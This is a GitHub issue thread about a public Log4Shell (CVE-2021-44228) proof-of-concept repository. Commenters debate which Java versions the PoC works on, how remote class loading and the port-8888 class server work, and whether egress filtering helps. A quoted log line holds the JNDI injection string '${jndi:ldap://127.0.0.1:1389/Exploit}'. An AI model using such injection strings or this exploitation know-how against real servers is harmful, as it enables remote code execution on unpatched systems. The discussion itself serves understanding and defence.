CVE-2021-44228-Apache-Log4j-Rce icon indicating copy to clipboard operation
CVE-2021-44228-Apache-Log4j-Rce copied to clipboard

Published 20 hours ago verified publisher icon tangxiaofeng7

Important note

Open NewDwarf opened this issue 3 years ago • 15 comments
trafficstars

In my opinion, the hype around the RCE is a bit excessive. Many bloggers refer to this repo as on a working PoC repo. Yes, it works but in not realistic environment. I verified that RCE doesn't work with the Java versions greater 8u121 released on May 18, 2017! After publication the new JNDI/LDAP based attack in 2016, the Java developers stopped remote class loading via JNDI object. The remote class loading is controlled by the 'com.sun.jndi.rmi.object.trustURLCodebase' property which is set to 'false' to prevent RCE attacks. This PoC explicitly set it 'true' to enable remote class loading capability. I believe nobody enable this capability on the production servers. So, this RCE doesn't work on more than 90% cases. @tangxiaofeng7 I would recommend to reflect this limitation in the README as many people think it works against absolutely any product which imports log4j.

NewDwarf avatar Dec 12 '21 22:12 NewDwarf

Hi, you can take a look at this passage: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

tangxiaofeng7 avatar Dec 13 '21 03:12 tangxiaofeng7

It can also cause information leakage at the same time. https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg

tangxiaofeng7 avatar Dec 13 '21 04:12 tangxiaofeng7

I would say 8u121 only done partial of the fix, after 8u191 the setting com.sun.jndi.rmi.object.trustURLCodebase = false is fully enforced.

Quaresma avatar Dec 13 '21 04:12 Quaresma

Anyway, this PoC which tries to exploit the JNDI reference method doesn't work for a long time. As I said forcing the com.sun.jndi.rmi.object.trustURLCodebase property to 'true' as it is done in the repo's sample is not a realistic scenario. And I believe this should be reflected in the main README.

NewDwarf avatar Dec 13 '21 05:12 NewDwarf

The POC doesn't work for me either, using Java 8.0.181-zulu - Can one please frame the conditions under which the PoC really works? I can compile and run, but the Calc gets never called using OSX 11.6

mobinauten avatar Dec 13 '21 08:12 mobinauten

It works for me with JDK 1.8.0_292 (Ubuntu) and JDK 1.8.0_282 (MacOS Big Sur) without extra settings I put a script there https://github.com/jeffli1024/log4j-rce-test in case you want to quickly verify it.

jeffli1024 avatar Dec 13 '21 13:12 jeffli1024

I tried and received the following 15:51:14.907 [main] ERROR log4j - ${jndi:ldap://127.0.0.1:1389/Exploit}

Von: Jeffrey Li @.> Antworten an: tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce @.> Datum: Montag, 13. Dezember 2021 um 14:09 An: tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce @.> Cc: @." @.>, Comment @.> Betreff: Re: [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce] Important note (Issue #17)

It works for me with JDK 1.8.0_292 (Ubuntu) and JDK 1.8.0_282 (MacOS Big Sur) without extra settings I put a script there https://github.com/jeffli1024/log4j-rce-test in case you want to quickly verify it.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android.

mobinauten avatar Dec 13 '21 15:12 mobinauten

I have one question about the port 8888 in the example. How does that work? Does that port 8888 mean something like look up the class in the current directory? ( where log4j class is)

AleksandarTokarev avatar Dec 13 '21 15:12 AleksandarTokarev

I have one question about the port 8888 in the example. How does that work? Does that port 8888 mean something like look up the class in the current directory? ( where log4j class is)

It's just a port on which the web server will host the Exploit.class file for remote class loading.

piyush-saurabh avatar Dec 13 '21 15:12 piyush-saurabh

How does this hosting occur?

AleksandarTokarev avatar Dec 13 '21 15:12 AleksandarTokarev

@AleksandarTokarev Read up on services and web infrastructure to understand how things like Log4j work.

mxchinegod avatar Dec 13 '21 16:12 mxchinegod

If you don't start the python HTTP server on port 8888, is the remote code still loaded?

Quaresma avatar Dec 13 '21 18:12 Quaresma

I wondered if the vulnerable server is hosted behind a firewall is that feasible to access the {jndi:ldap://127.0.0.1:1389/Exploit} or download the code from the web server 127.0.0.1:8888 at all? In most corporate environment it will be blocked assuming we are talking about a public ip instead of 127.0.0.1

nychan avatar Dec 14 '21 03:12 nychan

Yes egress filtering helps (at least to all attacks which are publically known, the German BSI claimed there are connection less payloads but I think they just missunderstood the class-download-less attacks, which still rely on connecting to the LDAP/RMI servers in the first place)

however, egress filtering is less common than you might think, even if it is a best practice baseline. all the vulnerable FAANGs in the world showed that.

ecki avatar Dec 14 '21 05:12 ecki

How does this hosting occur?

Yes serves the classifile from local dir after the LDAP/RMI server referenced its url. However this is only needed for this type of poc, it’s not needed when you use a more taylored deserialisation payload (which would re-use exiting classes ysoserial-style)

ecki avatar Dec 14 '21 05:12 ecki